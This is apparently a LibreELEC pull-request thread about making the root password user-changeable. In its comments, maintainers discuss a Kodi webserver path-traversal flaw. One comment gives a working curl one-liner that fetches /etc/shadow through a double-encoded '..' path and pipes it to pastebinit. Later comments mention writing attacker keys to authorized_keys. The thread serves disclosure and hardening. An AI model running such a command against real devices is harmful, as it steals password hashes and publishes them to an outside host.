### PR TITLE
allow user defined root password on a running system

### PR DESCRIPTION
**Pull request by vpeter4**
writable passwd/shadow files are located in /storage/.cache
they are copied from /etc/{passwd,shadow}.ro
when pasword is changed the encrypted password from shadow file is also copied to /flash/password file
in case of a problems /flash/password file has to be removed and then default files are used (and default password used) after reboot

in busybox target config maybe CONFIG_FEATURE_PASSWD_WEAK_CHECK should be set
which would refuse new passwords which are "weak"

### CODE REVIEW

File: config/functions [hunk 1]
```diff
@@ -167,18 +167,25 @@ require_eglibc() {
...
   mkdir -p ${INSTALL}/etc
-  touch ${INSTALL}/etc/passwd
-  if [ -z "`grep "$1:" ${INSTALL}/etc/passwd`" ]; then
-    echo "$1:x:$3:$4:$5:$6:$7" >> ${INSTALL}/etc/passwd
+  touch ${INSTALL}/etc/passwd.ro
+  if [ -z "`grep "$1:" ${INSTALL}/etc/passwd.ro`" ]; then
+    echo "$1:x:$3:$4:$5:$6:$7" >> ${INSTALL}/etc/passwd.ro
+  fi
+
+  if [ ! -h ${INSTALL}/etc/passwd ]; then
```
Comment (lrusak) [inline config/functions]: just use `ln -sf`

File: config/functions [hunk 2]
```diff
@@ -167,18 +167,25 @@ require_eglibc() {
...
+  [ "$PASSWORD" = "x" ] && PASSWORD="*"
+
+  touch ${INSTALL}/etc/shadow.ro
+  if [ -z "`grep "$1:" ${INSTALL}/etc/shadow.ro`" ]; then
+    echo "$1:$PASSWORD:::::::" >> ${INSTALL}/etc/shadow.ro
   fi
-  if [ -z "`grep "$1:" ${INSTALL}/etc/shadow`" ]; then
-    echo "$1:$PASSWORD:::::::" >> ${INSTALL}/etc/shadow
+
+  if [ ! -h ${INSTALL}/etc/shadow ]; then
```
Comment (lrusak) [inline config/functions]: again `ln -sf`

**Comment by fritsch** [comment]
Guys this is high priority:
```
curl http://libreelec:8080/image/image%3A%2F%2F..%252fetc%252fshadow  | pastebinit
```

**Comment by stefansaraev** [comment]
> ```
> curl http://libreelec:8080/image/image%3A%2F%2F..%252fetc%252fshadow  | pastebinit
> ```

my 2 cents @fritsch

in general, what you just said has nothing to do with LE runing as root and is completely unrelated to this PR.

there should be some sanity check in kodi's webserver. that's what is really high prio. you dont want to leak user's sources.xml (that may contain passwords), addon configs (that may contain pvr backend passwords, streaming site credentials and what not) or even user's ssh private keys right?

**Comment by fritsch** [comment]
That's wrong. The moment you make root pwd writable, the webserver can be used to alter it (!) ... and therefore make yourself remotely able to login ...

**Comment by stefansaraev** [comment]
I agree that this PR gives users false sense of "oh my system is now secure" and solves no real world problems. but saying that runing kodi as user would be more secure is giving the same false sense.. nothing more, nothing less.

yes, you have a valid point if the webserver can really be used to alter files. can it?? because if it can, we (not only LE) have a much, much bigger issue!

**Comment by fritsch** [comment]
My first point was much simpler: With kodi running as user - no chance to read the shadow ... not more, not less, nothing generic.
My second point was: if shadow suddenly gets writable, an attacker can change the pwd to 123 ... within no time.

> Can it?

Can you exclude it?

**Comment by stefansaraev** [comment]
seriously, on a non password protected kodi webserver, if there is a way to change any files (or files outside ~/.kodi, nothing stops me to find your actual username (by reading world readable etc/password or other means) that runs kodi and add my key to your authorized_keys and then log in.

hey, bad guys don't really need root to do lot of damage! 

now, see what I said above, and try to answer my question "is it possible to (re)write user-writable files using kodi's webserver", if your answer is yes, read and think agaon. if the answer is no.. well - read again. and thanks for trying to teach me how basic security works.

@vpeter4 and others: sorry for the off-topic discussion

**Comment by vpeter4** [comment]
@stefansaraev, discussion did open few things to consider. Like locking kodi webserver to some predefined folder(s) maybe? But I think this is stuff for separate PR.

**Comment by stefansaraev** [comment]
@vpeter4 yep indeed

IMO kodi's webserver is supposed to be a simple interface to kodi's music/video/etc library. it should have no access to read outside of few kodi specific directories (thumbnails and whatever else is needed for its operation) and should have NO access to write files, at all. nowhere!

if it can do all the shit fritsch said it can, then it is completely out of control and should be fixed (in kodi) ASAP. not shifting the blame instead to downstreams when a huge fail (not only to one or two downstreams) is just waiting to happen....

**Comment by fritsch** [comment]
I can't see any "blame shifting". I just would take great care if I was a distribution enabling the webserver by default without a password. Just take care.

**Comment by stefansaraev** [comment]
agree to that @fritsch 

@vpeter4 now on-topic:
If it was me to implement this feature, I would do it different. 
Instead of doing the script hackery, I would enable "passwd" applet in busybox, then patch glibc to use passwd and shadow from /storage/ (glibc is easy, and if needed, patch busybox, too, I didn't check if that's needed..). I would ship defaults in /usr/config (or whatever LE uses now) that are copied to /storage/ on first boot. that way 'passwd', 'adduser' (if enabled) and so on applets would work out of the box.

**Comment by vpeter4** [comment]
I only pushed little cleaned thing I already did back in 2013 by request. If this thing would actually be used it is not my call.
Sure, your thing would work too. But we are trying to remove patches not adding it :-)
Passwd applet from busybox is enabled and used. The reason for having passwd script is to copy password to /flash/password file. To make password recovery easy (it was suggested by team members).

**Comment by CvH** [comment]
just for cross reference http://trac.kodi.tv/ticket/17346

**Comment by escalade** [comment]
Say what? Kodi's webserver can write anywhere?? Why is that?

**Comment by chewitt** [comment]
I'm not sure about write anywhere, but read anywhere is enough of a problem.

**Comment by chewitt** [comment]
@vpeter4 I'm closing this as the idea has now been refined and simplified in #2284. Thanks for doing the original work on this to prove that password change _was_ possible, and allowing us to keep this PR open as a placeholder for so long.

**Comment by vpeter4** [comment]
> to prove that password change was possible

Obviously it was possible. Already 4 or 5 years back when I try this first time. Probably was ahead the time. Oh well.

**Comment by tavoc** [comment]
any news on that? Is it possible to restrict chorus to the kodi userdata folder?

**Comment by MilhouseVH** [comment]
> any news on that? Is it possible to restrict chorus to the kodi userdata folder?

Not at this time - any changes to limit the Kodi webserver file access will most likely have to come from Kodi themselves (if we had a solution for it we'd have already pushed it upstream).

If you are concerned about the security issues present in the Kodi webserver, then your best option is to not enable the Kodi webserver.

**Pull request closed without merging**